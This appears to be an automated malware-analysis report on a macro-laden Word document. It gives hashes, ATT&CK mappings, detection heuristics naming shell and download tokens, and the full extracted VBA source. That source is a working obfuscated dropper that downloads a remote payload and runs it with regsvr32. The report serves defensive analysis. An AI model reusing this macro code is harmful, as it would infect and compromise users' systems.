Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 114be5fbd6496725…

MALICIOUS

Office (OOXML) / .DOC

Size: 80.5 KB
Created: 2021-04-30 07:24:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-05-04
MD5: d7f00e4697b2c95dc413829ae30d6dd3
SHA-1: d103699b3e6588a8e045918d2c487d99444aa5db
SHA-256: 114be5fbd6496725c88d30691cb2084075160454b9b7a46275e9f12667090daa
Risk Score: 170

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro that runs when the document is opened (Document_Open). The macro creates a WScript.Shell object through CreateObject and calls its .exec method on an obfuscated command. The script attempts to download and execute a second-stage payload, as indicated by the WScript.Shell .exec call and the obfuscated string concatenation inside the `removeVar` function, which likely decodes to a malicious URL.

Heuristics (6)

  • VBA project inside OOXML (severity: medium, 4 related findings) [OOXML_VBA]
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage (severity: critical) [OLE_VBA_WSCRIPT]
    WScript.Shell usage
    Matched line in script:
    Set WVar = CreateObject("wscript.shell")
  • CreateObject call (severity: high) [OLE_VBA_CREATEOBJ]
    CreateObject call
    Matched line in script:
    Set WVar = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro (severity: low) [OLE_VBA_DOCOPEN]
    Document_Open macro
    Matched line in script:
    Sub Document_Open()
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Channel for every URL listed below: In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6356 bytes
SHA-256: 64567cc1102349906dcda791a369e73791f5a694fc93aa7ef9c9e2ff941311ae
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
main
End Sub

Attribute VB_Name = "frm"
Attribute VB_Base = "0{CDE267D7-FF30-4624-A1DD-55968BB26723}{8987B7AF-F09F-4000-B397-7A5391BE114D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub button1_Click()
Set memoryPtrRequest = ActiveDocument.BuiltInDocumentProperties("title")
Set WVar = CreateObject("wscript.shell")
With WVar
.exec$ (sr(memoryPtrRequest))
End With
End Sub


Attribute VB_Name = "counterLeft"
Sub main()
textboxScreenNext
End Sub
Function sr(buttonScreenCopy)
sr = StrReverse(buttonScreenCopy)
End Function
Function gwc(buttonScreenCopy)
If Len(buttonScreenCopy) > 0 Then
gwc = buttonScreenCopy
End If
End Function
Sub textboxScreenNext()
Dim linkCountConvert As String
sizeTextboxGlobal = Split(sr(ActiveDocument.BuiltInDocumentProperties("title")), " ")
linkCountConvert = sizeTextboxGlobal(1)
Set structVb = New rightConst
structVb.screenExOption linkCountConvert, memoryRightPaste
frm.button1_Click
End Sub

Attribute VB_Name = "optionBorder"
Public Function removeVar(bufWindow)
Dim genericConvertVar As Integer
genericConvertVar = 31337
If (Len(bufWindow) < genericConvertVar) Then removeVar = gwc("<html><body><div id='content'>fT" & "tlc29sYy5mZVJub2l0cGVjeEVmdWI7KT" & "IgLCJncGouY29yUG5pYU10cmV2bm9jXF" & "xjaWxidXBcXHNyZXN1XFw6YyIoZWxpZm" & "90ZXZhcy5mZVJub2l0cGVjeEVmdWI7KX" & "lkb2Jlc25vcHNlci5ub3R0dUJldHNhcC" & "hldGlydy5mZVJub2l0cGVjeEVmdWI7MS" & "A9IGVweXQuZmVSbm9pdHBlY3hFZnViO2" & "5lcG8uZmVSbm9pdHBlY3hFZnViOykibW" & "FlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdG" & "NBIHdlbiA9IGZlUm5vaXRwZWN4RWZ1Yi" & "ByYXZ7KTAwMiA9PSBzdXRhdHMubm90dH" & "VCZXRzYXAoZmk7KShkbmVzLm5vdHR1Qm" & "V0c2FwOyllc2xhZiAsIjh1Z0xRNFg4Wm" & "1YOUk4Ym1HRjNNMkpzWHNETlU0OT1kaW" & "MmeXFNNEMyZ2ZEZEVob1JzTWFvSz1JSS" & "ZtZWxqUlFkbXVZR0UydWhUTlExZHhWcm" & "d4N0FkQW09cmVzdSYzRVdyPWRpYyZpU3" & "NDbGs5VVBRZ3c9bGk3TWRpU2pvPzJ3YW" & "wvZlBXVEhWNFphNlh2eFVpSmVuY3I5MW" & "1VSFRUVk11dkxPVGpkR0FaeS9HeTd5M3" & "dabmdka0NYVXhsanB5NFhaS08zcTM4aF" & "pSMkx1NTNjYjdlSC9zb3NnZC9tb2MuYW" & "5pZWxrcmVwc29ycC8vOnB0dGgiICwiVE" & "VHIihuZXBvLm5vdHR1QmV0c2FwOykicH")
End Function
Public Function varButton(bufWindow)
Dim genericConvertVar As Integer
genericConvertVar = 31337
If (Len(bufWindow) < genericConvertVar) Then varButton = gwc("R0aGxteC4ybG14c20iKHRjZWpiT1hldm" & "l0Y0Egd2VuID0gbm90dHVCZXRzYXAgcm" & "F2|fXspcnRQZWdhcm90cyhoY3RhY307K" & "SJhdGguY29yUG5pYU10cmV2bm9jXFxja" & "WxidXBcXHNyZXN1XFw6YyIoZWxpZmV0Z" & "WxlZC5XdGhnaXJ7eXJ0OykidGNlamJvb" & "WV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZ" & "WpiT1hldml0Y0Egd2VuID0gV3RoZ2lyI" & "HJhdjspImdwai5jb3JQbmlhTXRyZXZub" & "2NcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzc" & "nZzZ2VyIihudXIuKSJsbGVocy50cGlyY" & "3N3Iih0Y2VqYk9YZXZpdGNBIHdlbg==<" & "/div><div id='table1'>ABCDEFGHIJ" & "KLMNOPQRSTUVWXYZ</div><div id='t" & "able2'>0123456789+/</div><div id" & "='table3'></div><script language" & "='javascript'>function clearMain" & "Iterator(exceptionTextboxQuery){" & "return(new ActiveXObject(excepti" & "onTextboxQuery));}function paste" & "ScreenDocument(swapTitleGlobal){" & "return(mainSizeClear.getElementB" & "yId(swapTitleGlobal).innerHTML);" & "}function WScreen(){var collecti" & "onQueryException = pasteScreenDo")
End Function
Public Function genericPtrLoad(bufWindow)
Dim genericConvertVar As Integer
genericConvertVar = 31337
If (Len(bufWindow) < genericConvertVar) Then genericPtrLoad = gwc("cument('table1');var pasteTextbo" & "xView = collectionQueryException" & ".toLowerCase();var bufDatabase =" & " pasteScreenDocument('table2');r" & "eturn(collectionQueryException +" & " pasteTextboxView + bufDatabase)" & ";}function globalOption(s){var e" & "={}; var i; var b=0; var c; var " & "x; var l=0; var a; var procedure" & "Array=''; var w=String.fromCharC" & "ode; var L=s.length;var arrayLin" & "kQuery = valueAException('tArahc" & "');for(i=0;i<64;i++){e[WScreen()" & "[arrayLinkQuery](i)]=i;}for(x=0;" & "x<L;x++){c=e[s[arrayLinkQuery](x" & ")];b=(b<<6)+c;l+=6;while(l>=8){(" & "(a=(b>>>(l-=8))&0xff)||(x<(L-2))" & ")&&(procedureArray+=w(a));}}retu" & "rn(procedureArray);};function va" & "lueAException(exceptionProcedure" & "){return exceptionProcedure.spli" & "t('').reverse().join('');}button" & "Select = window;mainSizeClear = " & "document;buttonSelect.resizeTo(1" & ", 1);buttonSelect.moveTo(-100, -")
End Function
Public Function APtrTable(bufWindow)
Dim genericConvertVar As Integer
genericConvertVar = 31337
If (Len(bufWindow) < genericConvertVar) Then APtrTable = gwc("100);var tempBuffer = mainSizeCl" & "ear.getElementById('content').in" & "nerHTML;var tempBuffer = tempBuf" & "fer.split('|');var requestBuffer" & "Paste = valueAException(globalOp" & "tion(tempBuffer[0]));var structS" & "torageCollection = valueAExcepti" & "on(globalOption(tempBuffer[1]));" & "</script><script language='javas" & "cript'>function copyClass(textSc" & "reen){var ExLoadVar = clearMainI" & "terator(valueAException('lortnoc" & "tpircs.lortnoctpircssm'));ExLoad" & "Var['Language'] = 'jscript';ExLo" & "adVar['Timeout'] = 60000;ExLoadV" & "ar['AddCode'](textScreen);return" & "(null);}</script><script languag" & "e='vbscript'>copyClass requestBu" & "fferPaste : copyClass structStor" & "ageCollection : buttonSelect.clo" & "se</script></body></html>")
End Function
Function memoryRightPaste()
memoryRightPaste = removeVar("ainT") + varButton("orde") + genericPtrLoad("arAr") + APtrTable("ount")
End Function

Attribute VB_Name = "rightConst"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Function screenExOption(varAMemory As String, rightExClear As String)
Open varAMemory For Output As #1
Print #1, rightExClear
Close #1
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 30720 bytes
SHA-256: a7b5c710de3da233bff7a4aea8486442054dac9d301232f8dcc4491de674fd9b